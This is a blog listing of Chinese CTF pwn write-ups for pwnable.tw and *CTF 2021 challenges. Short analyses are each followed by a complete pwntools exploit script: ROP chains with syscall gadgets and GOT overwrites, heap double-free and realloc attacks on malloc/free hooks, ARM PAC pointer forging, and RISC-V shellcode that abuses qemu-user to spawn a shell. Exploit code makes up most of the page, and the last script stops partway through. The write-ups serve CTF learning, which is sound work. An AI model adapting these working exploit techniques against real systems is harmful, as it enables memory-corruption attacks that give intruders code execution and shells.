分类 writeups 下的文章

[pwnable.tw] unexploitable - 利用微偏移在read库函数中找syscall gadget

作者: eqqie
时间: 2021-01-26
分类: pwnable.tw
评论

分析

这题和pwnable.kr原题的差别在于程序本身没有了syscall这个gadget，需要另找别处。题目给了read和栈溢出，栈迁移是少不了的。考虑到GOT表可写，并且关于read的库实现有个可以利用的gadget：在read库函数起始位置+0xe的时候有一个syscall，并且只要返回值正常，后面会接上ret （重点！）。

思路

由分析可知，这题的关键在于控制read库函数+0xe处的gadget进行地址泄露。这个偏移只需要往read的got表地址写一个字节，同时写完这个字节后RAX的值刚好变成1，也就是SYS_write的系统调用号。当下一次再调用read时就会变成write；
得到write之后需要泄露__libc_start_main的got表值来计算libc基址。注意最好一个一个字节泄露，一次泄露多个字节会导致RAX过大，后续不方便控制。每次write一个字节可以保证RAX始终为1；
完成泄露后还需要切换回SYS_read把算出来的system地址写入read_got中，最后传入提前写好的/bin/sh参数地址来getshell。这一步只需要write(1, addr, 0)输出0个字节，RAX的值就会变回0，也就是SYS_read的系统调用号；
环境很坑，每次输入前尝试把sleep时间调长一点，否则会出现read不进去的情况。

EXP

from pwn import *
import time

#p = process("./unexploitable", env={"LD_PRELOAD":"./libc_64.so.6"})
p = remote("chall.pwnable.tw", 10403)
elf = ELF("./unexploitable")
libc = ELF("./libc_64.so.6")

context.log_level = "debug"

# const
offset_byte = b"\x0e" # read offset to syscall

# addr
bss_addr = 0x601028
main_addr = 0x400544
read_plt = elf.symbols[b"read"]
read_got = elf.got[b"read"]
sleep_got = elf.got[b"sleep"]
libc_start_main = elf.got[b"__libc_start_main"]

# gadget
csu_gadget_1 = 0x4005e6
csu_gadget_2 = 0x4005d0
pop_rbp_ret = 0x400512
leave_ret = 0x400576

def csu_rop(rbx:int, rbp:int, call:int, rdi:int, rsi:int, rdx:int):
    rop = p64(csu_gadget_1)
    rop += p64(0) #padding
    rop += p64(rbx) #rbx
    rop += p64(rbp) #rbp
    rop += p64(call) #r12->call addr
    rop += p64(rdi) #r13->edi
    rop += p64(rsi) #r14->rsi
    rop += p64(rdx) #r15->rdx
    rop += p64(csu_gadget_2)
    rop += b"\x00"*0x38 #pad
    return rop

def exp():
    #gdb.attach(p, "b *0x400576\nc\n")
    #gdb.attach(p, "b system\nc\n")

    # migrate stack to bss && call read
    target_stack_1 = bss_addr + (0x100-0x8) # also write /bin/sh
    payload1 = b"a"*0x10 + p64(0xdeadbeef)
    payload1 += p64(csu_gadget_1)
    payload1 += p64(0) #padding
    payload1 += p64(0) #rbx
    payload1 += p64(1) #rbp
    payload1 += p64(read_got) #r12->call addr
    payload1 += p64(0) #r13->edi
    payload1 += p64(target_stack_1) #r14->rsi
    payload1 += p64(0x600) #r15->rdx
    payload1 += p64(csu_gadget_2)
    payload1 += b"\x00"*0x38 #pad
    payload1 += p64(pop_rbp_ret) #set rbp
    payload1 += p64(target_stack_1+0x8)
    payload1 += p64(leave_ret) # migrate
    print("len(payload1):", hex(len(payload1)))
    p.sendline(payload1)

    #pause()
    time.sleep(7)
    # read payload to target_stack_1
    payload2 = b"/bin/sh\x00"
    payload2 += p64(0xdeadbeef) #new rbp
    payload2 += csu_rop(0, 1, read_got, 0, read_got, 1) # modify LSB of read_got
    for i in range(6):
        payload2 += csu_rop(0, 1, read_got, 1, libc_start_main+i, 1) # leak sleep_got
    payload2 += csu_rop(0, 1, read_got, 1, libc_start_main, 0) # make RAX=0
    payload2 += csu_rop(0, 1, read_got, 0, read_got, 0x8) # make read_got -> system
    payload2 += csu_rop(0, 1, read_got, target_stack_1, 0, 0) # system("/bin/sh")
    payload2 += p64(main_addr)
    print("len(payload2):", hex(len(payload2)))
    p.sendline(payload2)

    #pause()
    time.sleep(7)
    p.send(b"\x7e")
    time.sleep(4)
    sleep_addr = u64(p.recv(6).ljust(8, b"\x00"))
    libc_base = sleep_addr - libc.symbols[b"__libc_start_main"]
    system = libc_base + libc.symbols[b"system"]
    print("sleep_addr:", hex(sleep_addr))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))

    #pause()
    time.sleep(7)
    p.send(p64(system))

    p.sendline("cat /home/*/flag")
    p.recvall()

if __name__ == "__main__":
    exp()

[pwnable.tw] De-ASLR - "call reg"式ROP链+栈残留指针运用

作者: eqqie
时间: 2021-01-26
分类: pwnable.tw
评论

分析

题目只给了一个gets栈溢出，got开了全保护不能修改。按照题意对付aslr的话，爆破几率太渺茫了。应该要结合call reg以及栈残留指针来构造rop。

思路

_libc_csu_init里面有这么一条gadget：call qword ptr [r12+rbx*8]。这意味着如果能够控制r12为一个libc地址，rbx为某个函数offset/8的话，就可以调用这个函数。
由于gets在调用时会在栈低地址留下_IO_2_1_stdin的地址，我们可以利用这个地址加上一定偏移去调用__IO_file_write来泄露地址。__IO_file_write函数与write函数的区别在于，第一个参数变成了一个文件结构体。为了成功利用，这个结构体中只需要保证fileno==1和flag2==2就能成功调用（非常理想）。
为了利用栈残留信息，需要把栈迁移到bss这种地址固定并可控的段来操作。在此之前还要先向bss中不会受到调用栈影响的区域提前写好fake_file。
迁移到bss上需要先执行一次gets让bss中残留下libc地址信息。然后再往远处迁移栈，避免利用时破坏残留在栈上的指针。迁移到远处后需要计算好残留指针的地址，往这个地址的上下填充其它值——因为gadget的限制，往往需要一次pop很多寄存器，而需要让残留指针放在r12寄存器里面就得把其它寄存器也构造好。其它寄存器涉及到传参以及分支跳转——注意让rbp=rbx+1防止跳转。
最终构造完在call reg之前应该保证：
- RDI为fake_file地址
- RSI为gets的got表地址
- RDX为输出长度
- RBX为(__IO_file_write-残留指针)/8 (注意残留指针不一定是 _IO_2_1_stdin，因为gets在写的时候末位会有\x00截断覆盖掉_IO_2_1_stdin低位)
- R12为残留指针
- EBP为rbx+1
泄露完地址走一次one_gadget就可以getshell了

EXP

from pwn import *

#p = process("./deaslr", env={"LD_PRELOAD":"./libc_64.so.6"})
p = remote("chall.pwnable.tw", 10402)
elf = ELF("./deaslr")
libc = ELF("./libc_64.so.6")
context.log_level = "debug"

# addr
main_addr = 0x400536
gets_plt = elf.symbols[b"gets"]
gets_got = elf.got[b"gets"]
bss_addr = 0x601010
data_addr = 0x601000

# gadget
pop_rbp_ret = 0x4004a0
leave_ret = 0x400554
ret = 0x4003f9
pop_rdi_ret = 0x4005c3
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x4005ba
pop_r12_r13_r14_r15_ret = 0x4005bc
pop_rsp_r13_r14_r15_ret = 0x4005bd
call_r12_plus_rbx_mul_8 = 0x4005a9
set_args_and_call = call_r12_plus_rbx_mul_8 - 0x9
mveax0_leave_ret = 0x40054f

# struct
fake_file = b"\x00"*0x70+p64(1)+p64(2) # fileno flag
fake_file = fake_file.ljust(0xe0, b"\x00")

def exp():
    #gdb.attach(p, "b *0x40054f\nc\n")

    # write fake_file to bss
    fake_file_addr = bss_addr+0x100
    payload1 = b"a"*0x18 + p64(pop_rdi_ret) + p64(fake_file_addr) + p64(gets_plt) + p64(main_addr)
    p.sendline(payload1)

    p.sendline(fake_file)

    # Migrate stack to bss (to control stack_val)
    target_stack = bss_addr+0x200
    payload2 = b"a"*0x10 + p64(target_stack) + p64(pop_rdi_ret) + p64(target_stack) + p64(gets_plt)
    payload2 += p64(leave_ret)
    p.sendline(payload2)

    # write target_stack
    target_stack_2 = bss_addr + 0x400
    payload3 = p64(0xdeadbeef) #new rbp
    payload3 += p64(pop_rdi_ret) # get(target_stack_2)
    payload3 += p64(target_stack_2) #arg
    payload3 += p64(gets_plt)

    payload3 += p64(pop_rsp_r13_r14_r15_ret) # move to stack_2
    payload3 += p64(target_stack_2)
    p.sendline(payload3)

    # set target_stack_2
    payload4 = p64(0)*3
    payload4 += p64(pop_rdi_ret)
    payload4 += p64(target_stack-0x30-0x30)
    payload4 += p64(gets_plt) # set stack low
    payload4 += p64(pop_rdi_ret)
    payload4 += p64(target_stack-0x30+0x8)
    payload4 += p64(gets_plt) # set stack high
    payload4 += p64(pop_rsp_r13_r14_r15_ret)
    payload4 += p64(target_stack-0x30-0x30)
    p.sendline(payload4)

    ## low
    low = p64(0)*3 + p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
    low += p64(0xfffffffffffffdeb) #rbx
    low += p64(0xfffffffffffffdeb+1) #rbp
    p.sendline(low)
    ## high
    high = p64(0x100) #r13 -> rdx
    high += p64(gets_got) #r14 -> rsi
    high += p64(fake_file_addr) #r15 -> edi
    high += p64(set_args_and_call)
    high += b"a"*0x38
    high += p64(main_addr)
    p.sendline(high)

    # get leak addr
    puts_addr = u64(p.recv(8))
    libc_base = puts_addr - libc.symbols[b"gets"]
    system = libc_base + libc.symbols[b"system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    one = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
    one_gadget = libc_base + one[0]
    print("puts_addr:", hex(puts_addr))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))
    print("binsh:", hex(binsh))
    print("one_gadget:", hex(one_gadget))

    ## get shell
    #payload5 = b"a"*0x18 + p64(pop_rdi_ret) + p64(binsh) + p64(ret)*8 + p64(system) + p64(main_addr)
    payload5 = b"a"*0x18 + p64(one_gadget) # set eax=0

    p.sendline(payload5)

    p.interactive()

if __name__ == "__main__":
    exp()

[pwnable.tw] Break Out - realloc特性利用

作者: eqqie
时间: 2021-01-23
分类: pwnable.tw
评论

一些怨言

题目本身非常容易，利用UAF构造出一条通向malloc_hook的fastbin。

然后利用好realloc会copy原有内容到新堆块的特性，提前布置好payload到堆上，绕过security_read向malloc_hook中写入one_gadget。

建议这种受到堆偏移影响很大的题最好给出Dockfile，不然纯浪费时间，特傻逼！！

EXP：

from pwn import *

p = remote("chall.pwnable.tw", 10400)
#p = process("./breakout", env={"LD_PRELOAD":"./libc_64.so.6"})
elf = ELF("./breakout")
libc = ELF("./libc_64.so.6")

context.arch = "amd64"
context.log_level = "debug"

def list_all():
    p.sendafter(b"> ", b"list\n")

def set_note(cell:int, size:int, content):
    p.sendafter(b"> ", b"note\n")
    p.sendafter(b"Cell: ", str(cell).encode())
    p.sendafter(b"Size: ", str(size).encode())
    p.sendafter(b"Note: ", content)

def punish(cell:int):
    p.sendafter(b"> ", b"punish\n")
    p.sendafter(b"Cell: ", str(cell).encode())  

def exp():
    # leak libc
    set_note(6, 0x80, b"aaaa")
    set_note(7, 0x20, b"bbbb")
    set_note(6, 0x90, b"cccc")
    set_note(8, 0x80, b"a"*8)
    list_all()
    p.recvuntil(b"Life imprisonment, murder")
    p.recvuntil(b"aaaaaaaa")
    libc_leak = u64(p.recv(6).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x108 + 0xa0 - libc.symbols[b"__malloc_hook"]
    malloc_hook = libc_base + libc.symbols[b"__malloc_hook"]
    fake_chunk = malloc_hook - 0x23
    one_list = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
    print("[*] libc_leak:", hex(libc_leak))
    print("[*] libc_base:", hex(libc_base))
    print("[*] malloc_hook:", hex(malloc_hook))
    print("[*] fake_chunk:", hex(fake_chunk))

    #gdb.attach(p)

    # leak heap
    remote_offset = 0x410 #remote-0x410  local-0x0
    punish(1)
    set_note(9, 0x48, p64(malloc_hook+0x68)*2)
    list_all()
    p.recvuntil(b"multiple homicides")
    p.recvuntil(b"Prisoner: ")
    heap_leak = u64((b""+p.recv(6)).ljust(8, b"\x00"))
    heap_base = heap_leak - 0x2169a0 + remote_offset
    print("[*] heap_leak:", hex(heap_leak))
    print("[*] heap_base:", hex(heap_base))

    # realloc attach
    ## link to fake_chunk
    set_note(2, 0x68, b"aaaa") #target_chunk
    set_note(3, 0x20, b"split")
    set_note(2, 0x78, b"bbbb")
    target_chunk = heap_base + 0x2169a0 - remote_offset
    print("[*] target_chunk:", hex(target_chunk))
    payload = p64(heap_base)*3+p64(0x000000010000002d)+p64(heap_base)+p64(0x10)+p64(target_chunk+0x10)
    set_note(9, 0x48, payload)
    set_note(1, 0x10, p64(fake_chunk))

    ## get_fakechunk
    set_note(3, 0x68, b"cccc")
    one_gadget = libc_base + one_list[3]
    set_note(4, 0x30, b"a"*(0x13-0x8)+p64(one_gadget)+p64(libc_base+0x83b1b))
    set_note(5, 0x40, b"split")
    ## write malloc_hook
    set_note(4, 0x68, b"")
    print("[*] malloc_hook:", hex(malloc_hook))
    print("[*] one_gadget:", hex(one_gadget))

    # get shell
    p.sendafter(b"> ", b"note\n")
    p.sendafter(b"Cell: ", b"0")
    p.sendafter(b"Size: ", str(0x80).encode())

    p.interactive()

if __name__ == "__main__":
    exp()

[starCTF / *CTF 2021] Pwn方向writeup

作者: eqqie
时间: 2021-01-09
分类: writeups,XCTF,*CTF
评论

babyheap

18.04 libc2.27堆题,delete有double free

白给题，触发malloc_consolidate就可以leak+overlapping了

EXP：

from pwn import *

#p = process("./pwn")
p = remote("52.152.231.198", 8081)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
libc = ELF("./libc-2.27.so")
context.log_level = "debug"


def add(idx:int, size:int):
    p.recvuntil(b">> \n")
    p.sendline(b"1")
    p.recvuntil(b"input index\n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"input size\n")
    p.sendline(str(size).encode())
    
def delete(idx:int):
    p.recvuntil(b">> \n")
    p.sendline(b"2")
    p.recvuntil(b"input index\n")
    p.sendline(str(idx).encode())
    
def edit(idx:int, content):
    p.recvuntil(b">> \n")
    p.sendline(b"3")
    p.recvuntil(b"input index\n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"input content\n")
    p.send(content)
    
def show(idx:int):
    p.recvuntil(b">> \n")
    p.sendline(b"4")
    p.recvuntil(b"input index\n")
    p.sendline(str(idx).encode())
    
def leaveName(name):
    p.recvuntil(b">> \n")
    p.sendline(b"5")
    p.recvuntil(b"your name:\n")
    p.send(name)
    
def showName():
    p.recvuntil(b">> \n")
    p.sendline(b"6")

def exp():
    # leak libc
    for i in range(16):
        add(i, 0x20) #0-9
    for i in range(15):
        delete(i) # del 0-9
    leaveName(b"123123")
    show(7)
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x3ebe10
    malloc_hook = libc_base + libc.symbols[b"__malloc_hook"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    system = libc_base + libc.symbols[b"system"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("malloc_hook:", hex(malloc_hook))
    print("free_hook:", hex(free_hook))
    
    # overlapping && double free
    add(0, 0x50) #0
    edit(0, p64(0)*4+p64(0x61))
    delete(8)
    edit(0, p64(0)*4+p64(0x61)+p64(free_hook-0x8))
    
    # attack free_hook
    add(1, 0x50) #1
    add(1, 0x50) #1
    edit(1, p64(system))
    print("free_hook:", hex(free_hook))
    edit(0, p64(0)*4+p64(0x61)+b"/bin/sh\x00")
    delete(8)
    
    #gdb.attach(p)
    
    p.interactive()

if __name__ == "__main__":
    exp()

babypac

arm架构的题，有栈溢出机会

数据结构：

从0x412050开始的结构体数组

strcut aaa{
QWORD id;
QWORD lock;
};

分析：

add函数将id设为你的输入，lock设为0
lock函数将id设为sub_4009D8(id)，lock设为1
show函数当lock为0时候打印id，lock为1的时候不打印
auth函数检查是否sub_4009d8(0x10A9FC70042)为id，是的话给栈溢出机会

这里有整数溢出，当idx由unsigned解释为int得时候为-2得时候，可控name就变为我们输入得，然后：

这里就可以绕过检测，来使得name为那个大整数从而溢出。溢出的话使用rop.可以mprotect改bss段，然后shellcode。使用通用gadget。或者自己构造。

思路：

PACIA指令对跳转指针进行签名，签名结果被函数加密了，找shallow写了脚本解出签名后的指针
然后用csu gadget leak出puts的地址低三字节，拼接出完整地址
ret回main同样的方法调用read往一个RW地址写入system_addr+b"/bin/sh\x00"
ret回main同样的方法调用system（借助上一步写入的函数地址和参数）

EXP：

from pwnlib.util.iters import mbruteforce
import string
from hashlib import sha256
from pwn import *
import time

#p = process(argv=["qemu-aarch64","-cpu", "max", "-L", ".", "-g", "1234", "./chall"])
#p = process(argv=["qemu-aarch64","-cpu", "max", "-L", ".", "./chall"])
p = remote("52.255.184.147", 8080)
elf = ELF("./chall")
libc = ELF("./lib/libc.so.6")
context.log_level = "debug"
context.arch = "aarch64"

def add(_id:int):
    p.recvuntil(b">> ")
    p.sendline(b"1")
    p.recvuntil(b"identity: ")
    p.sendline(str(_id).encode())
    
def lock(idx):
    p.recvuntil(b">> ")
    p.sendline(b"2")
    p.recvuntil(b"idx: ")
    p.sendline(str(idx).encode())
    
def show():
    p.recvuntil(b">> ")
    p.sendline(b"3")

def auth(idx):
    p.recvuntil(b">> ")
    p.sendline(b"4")
    p.recvuntil(b"idx: ")
    p.sendline(str(idx).encode())
    
def unshiftleft(n , shift , mask = 0xffffffffffffffff):
    res = n
    temp = len(bin(n)[2:]) // shift + 1
    for _ in range(temp):
        res = n ^ ((res << shift) & mask)
    return res
def unshiftright(n , shift , mask = 0xffffffffffffffff):
    res = n
    temp = len(bin(n)[2:]) // shift + 1
    for _ in range(temp):
        res = n ^ ((res >> shift) & mask)
    return res
    
def unshift(c):
    c = unshiftright(c , 13)
    c = unshiftleft(c , 31)
    c = unshiftright(c , 11)
    c = unshiftleft(c , 7)
    return c
    
# global const
bss_name = 0x412030
bss_list = 0x412050

curr_ret_addr = 0x400da4
csu_gadget_1 = 0x400FF8
csu_gadget_2 = 0x400FD8
puts_got = 0x411FD0
read_got = 0x411FD8
main_addr = 0x400F5C

def exp():
                        
    # set name
    p.recvuntil(b"input your name: ")
    name = p64(csu_gadget_1) + p64(0) + p64(0x10A9FC70042) + p64(0)
    p.send(name) #0x3f000000400ff8

    lock(-2)
    add(0xdeadbeef) #0
    show()
    p.recvuntil(b"name: ")
    encode_csu_gadget_1 = u64(p.recvuntil(b"\x01\n", drop=True))
    print("encode_csu_gadget_1:", hex(encode_csu_gadget_1))
    signed_csu_gadget_1 = unshift(encode_csu_gadget_1)
    print("signed_csu_gadget_1:", hex(signed_csu_gadget_1))
    
    lock(-1)
    auth(-1)
    
    # stack overflow
    payload = b"a"*0x28
    payload += p64(signed_csu_gadget_1)
    payload += p64(csu_gadget_2)*2
    payload += p64(0) + p64(1)
    payload += p64(puts_got) + p64(puts_got)
    payload += p64(0) + p64(0)
    payload += p64(main_addr) + p64(main_addr)
    payload += p64(csu_gadget_2)
    p.sendline(payload)
    
    libc_leak = p.recvuntil(b"\n", drop=True)
    libc_leak = (libc_leak+b"\x00\x40").ljust(8, b"\x00")
    puts = u64(libc_leak)
    libc_base = puts - libc.symbols[b"puts"]
    system = libc_base + libc.symbols[b"system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    mprotect = libc_base + libc.symbols[b"__mprotect"]
    print("puts:", hex(puts))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))
    print("binsh:", hex(binsh))
    print("mprotect:", hex(mprotect))

    # set name
    p.recvuntil(b"input your name: ")
    name = p64(csu_gadget_1) + p64(0) + p64(0x10A9FC70042) + p64(0)
    p.send(name) #0x3f000000400ff8
    
    lock(-2)
    add(0xdeadbeef) #0
    show()
    p.recvuntil(b"name: ")
    encode_csu_gadget_1 = u64(p.recvuntil(b"\x01\n", drop=True))
    print("encode_csu_gadget_1:", hex(encode_csu_gadget_1))
    signed_csu_gadget_1 = unshift(encode_csu_gadget_1)
    print("signed_csu_gadget_1:", hex(signed_csu_gadget_1))
    
    lock(-1)
    auth(-1)
    
    # stack overflow
    payload = b"a"*0x28
    payload += p64(signed_csu_gadget_1)
    payload += p64(csu_gadget_2)*2
    payload += p64(0) + p64(1)
    payload += p64(read_got) + p64(0)
    payload += p64(0x412060) + p64(100)
    payload += p64(main_addr) + p64(main_addr)
    payload += p64(csu_gadget_2)
    p.sendline(payload)
    
    p.sendline(p64(system)+b"/bin/sh\x00")
    
    # set name
    p.recvuntil(b"input your name: ")
    name = p64(csu_gadget_1) + p64(0) + p64(0x10A9FC70042) + p64(0)
    p.send(name) #0x3f000000400ff8
    
    lock(-2)
    add(0xdeadbeef) #0
    show()
    p.recvuntil(b"name: ")
    encode_csu_gadget_1 = u64(p.recvuntil(b"\x01\n", drop=True))
    print("encode_csu_gadget_1:", hex(encode_csu_gadget_1))
    signed_csu_gadget_1 = unshift(encode_csu_gadget_1)
    print("signed_csu_gadget_1:", hex(signed_csu_gadget_1))
    
    lock(-1)
    auth(-1)
    
    # stack overflow
    payload = b"a"*0x28
    payload += p64(signed_csu_gadget_1)
    payload += p64(csu_gadget_2)*2
    payload += p64(0) + p64(1)
    payload += p64(0x412060) + p64(0x412060+0x8)
    payload += p64(0) + p64(0)
    payload += p64(main_addr) + p64(main_addr)
    payload += p64(csu_gadget_2)
    p.sendline(payload)
    
    p.interactive()

def proof_of_work(p):
    p.recvuntil("xxxx+")
    suffix = p.recv(16).decode("utf8")
    p.recvuntil("== ")
    cipher = p.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
                        cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    p.sendlineafter("Give me xxxx:", proof)


if __name__ == "__main__":
    proof_of_work(p)
    exp()

Favourite Architecure flag1

RISCV PWN，憋shellcode

远程栈固定，本地写完后稍加修改就打通了远程
栈溢出后用主函数末尾的gadget跳到自定义的一个栈位置上开始执行编辑好的orw shellcode
RISCV的shellcode编写可以借助Ghidra右键patch功能（会显示16进制代码）

EXP：

from pwn import *

#p = process(argv=["./qemu-riscv64", "-g", "1234", "./main"])
#p = process(argv=["./qemu-riscv64", "./main"])
p = remote("119.28.89.167", 60001)
#p = remote("127.0.0.1", 60001)
context.log_level = "debug"
#context.arch = "riscv64"
elf = ELF("./main")

# overflow offset: 0x120
# ret_addr: 0x11300

def exp():
    p.recvuntil(b"Input the flag: ")
    #p.sendline(b"a"*0x4b8)
    ## openat(root, "/home/pwn/flag")
    shellcode = b"\x01\x45" #c.li a0, 0
    shellcode += b"\x01\x11" #c.addi sp -0x20
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x01\x46" #c.li a2, 0
    shellcode += b"\x93\x08\x80\x03" #li a7, 56
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## read(flag_fd, reg_sp, 30)
    shellcode += b"\x0d\x45" #c.li a0, 5
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x13\x06\x20\x03" #c.li a2, 30
    shellcode += b"\x93\x08\xf0\x03" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## write(1, reg_sp, 30)
    shellcode += b"\x05\x45" #c.li a0, 5
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x13\x06\x20\x03" #c.li a2, 30
    shellcode += b"\x93\x08\x00\x04" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    print("shellcode len:", hex(len(shellcode)))
    shellcode = shellcode.ljust(0x40, b"\x00")+b"/home/pwn/flag\x00"
    
    
    payload = b"a"*0x120+p64(0x1058a)
    payload = payload.ljust(0x2c8, b"a")
    payload += shellcode
    payload = payload.ljust(0x320, b"a")
    payload += p64(0x4000800e10)
    
    p.sendline(payload)
    p.interactive()

if __name__ == "__main__":
    exp()

Favourite Architecure flag2

接着上一题，不过为了有足够的空间需要把shellcode的位置做调整，sp的位置做调整，以便读取/proc/self/maps泄露地址

观察了qemu的源码以及实际测试发现，qemu-user没有做好地址隔离，如果泄露出地址后借助mprotect修改qemu got表所在段权限，修改mprotect函数got表就可以执行system("/bin/sh\x00")

坑点：

shellcode位置要安排好，以免读文件覆盖掉shellcode
qemu对/proc/self/maps路径做了限制，可以改成/home/**/proc/self/maps来绕过
qemu-user地址隔离做的不好，直接vmmap虽然看不到qemu的内存，但是可以用mprotect修改其权限，改掉之后在调试器中hexdump就可以看到内存了
如果想修改mprotect_got指向system要注意，在进入mprotect系统调用时qemu会检查第一个参数的地址是否页对齐，对齐了才会call mprotect_got上的指针。这导致在利用时需要先把flag存到bss或者data段某些页对齐的地址上（大坑
源码：
```
    if ((start & ~TARGET_PAGE_MASK) != 0)
        return -EINVAL;
```
注意li指令立即数大小有限制，可以结合位运算扩大

EXP：

from pwn import *
import time

#p = process(argv=["./qemu-riscv64", "-g", "1234", "./main"])
#p = process(argv=["./qemu-riscv64", "./main"])
p = remote("119.28.89.167", 60001)
#p = remote("127.0.0.1", 60001)
libc = ELF("./libc-2.27.so")
context.log_level = "debug"
#context.arch = "riscv64"
elf = ELF("./main")

# overflow offset: 0x120
# ret_addr: 0x11300

def exp():
    p.recvuntil(b"Input the flag: ")
    #p.sendline(b"a"*0x4b8)
    ## openat(root, path, 0)
    shellcode = b"\x01\x45" #c.li a0, 0
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x01\x46" #c.li a2, 0
    shellcode += b"\x93\x08\x80\x03" #li a7, 56
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## read(flag_fd, reg_sp, 30)
    shellcode += b"\x0d\x45" #c.li a0, 3
    #shellcode += b"\x15\x45" #c.li a0, 5
    shellcode += b"\x13\x01\x01\xb0" #addi sp, sp, -0x500
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x13\x01\x01\x50" #addi sp, sp, 0x500
    shellcode += b"\x13\x06\x00\x32" #li a2, 0x1b0
    shellcode += b"\x93\x08\xf0\x03" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## write(1, reg_sp, 30)
    shellcode += b"\x05\x45" #c.li a0, 1
    shellcode += b"\x13\x01\x01\xb0" #addi sp, sp, -0x500
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x13\x01\x01\x50" #addi sp, sp, 0x500
    shellcode += b"\x13\x06\x00\x32" #li a2, 0x1b0
    shellcode += b"\x93\x08\x00\x04" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## read(0, reg_sp, 0x10)
    shellcode += b"\x01\x45" #c.li a0, 0
    shellcode += b"\x13\x01\x01\xb0" #addi sp, sp, -0x500
    shellcode += b"\x8a\x85" #c.mv a1, sp
    shellcode += b"\x13\x01\x01\x50" #addi sp, sp, 0x500
    shellcode += b"\x41\x46" #c.li a2, 0x10
    shellcode += b"\x93\x08\xf0\x03" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    shellcode += b"\x13\x01\x01\xb0" #addi sp, sp, -0x500
    shellcode += b"\x02\x64" #c.ldsp s0, 0x0(sp) => qemu_base_2
    shellcode += b"\xa2\x64" #c.ldsp s1, 0x8(sp) => mprotect_got
    shellcode += b"\x13\x01\x01\x50" #addi sp, sp, 0x500
    ## mprotect(start, len, 7)
    shellcode += b"\x13\x05\x04\x00" #mv a0, s0
    shellcode += b"\x93\x05\xc0\x03" #li a1, 0x3c
    shellcode += b"\x93\x95\xc5\x00" #slli a1, a1, 0xc
    shellcode += b"\x1d\x46" #c.li a2, 0x7
    shellcode += b"\x93\x08\x20\x0e" #li a7, 226(mprotect)
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## write(1, mprotect_got, 0x8)
    shellcode += b"\x05\x45" #c.li a0, 1
    shellcode += b"\xa6\x85" #c.mv a1, s1
    shellcode += b"\x13\x06\x80\x00" #li a2, 0x8
    shellcode += b"\x93\x08\x00\x04" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## read(0, mprotect_got, 8)
    shellcode += b"\x01\x45" #c.li a0, 0
    shellcode += b"\x93\x85\x04\x00" #mv a1, s1 => mprotect_got
    shellcode += b"\x21\x46" #c.li a2, 0x8
    shellcode += b"\x93\x08\xf0\x03" #li a7, 63
    shellcode += b"\x73\x00\x00\x00" #ecall
    ## store "/bin/sh" to 0x6d000 (PAGE_MASK_ADDR)
    shellcode += b"\x13\x01\x81\x01" #addi sp, 0x18
    shellcode += b"\x03\x39\x01\x00" #ld s2, 0x0(sp) load "/bin/sh"
    shellcode += b"\x13\x01\x81\xfe" #addi sp, -0x18
    shellcode += b"\x13\x01\xd0\x06" #li sp, 0x6d
    shellcode += b"\x13\x11\xc1\x00" #slli sp, sp, 0x4
    shellcode += b"\x23\x30\x21\x01" #sd s2, 0x0(sp) store "/bin/sh"
    ## system("/bin/sh")
    shellcode += b"\x13\x05\x01\x00" #mv a0, sp    
    shellcode += b"\x93\x05\xc0\x03" #li a1, 0x3c
    shellcode += b"\x93\x95\xc5\x00" #slli a1, a1, 0x18
    shellcode += b"\x1d\x46" #c.li a2, 0x7
    shellcode += b"\x93\x08\x20\x0e" #li a7, 226(mprotect)
    shellcode += b"\x73\x00\x00\x00" #ecall
    

    print("shellcode len:", hex(len(shellcode)))    
    
    payload = b"a"*0x120+p64(0x1058a)
    payload += shellcode
    payload = payload.ljust(0x320, b"a")
    payload += p64(0x4000800c70)
    payload += b"/proc/self/task/../maps\x00/bin/sh\x00"
    
    p.sendline(payload)
    
    #time.sleep(1)
    for i in range(6):
        p.recvuntil(b"\n")
    qemu_base = int(p.recvuntil(b"-", drop=True), 16)
    p.recvuntil(b"\n")
    qemu_base_2 = int(p.recvuntil(b"-", drop=True), 16)
    p.recv()
    
    do_syscall_1 = qemu_base + 0x141100
    do_syscall = qemu_base + 0x14cb50
    mprotect_got = qemu_base + 0x6A3200
    print("[*] qemu_base:", hex(qemu_base))
    print("[*] do_syscall_1:", hex(do_syscall_1))
    print("[*] mprotect_got:", hex(mprotect_got))
    print("[*] qemu_base_2:", hex(qemu_base_2))

    p.send(p64(qemu_base_2)+p64(mprotect_got))
    
    mprotect_libc = u64(p.recv(8))
    libc_base = mprotect_libc - libc.symbols[b"__mprotect"]
    system = libc_base + libc.symbols[b"system"]
    print("[*] mprotect_libc:", hex(mprotect_libc))
    print("[*] libc_base:", hex(libc_base))
    print("[*] system:", hex(system))
    
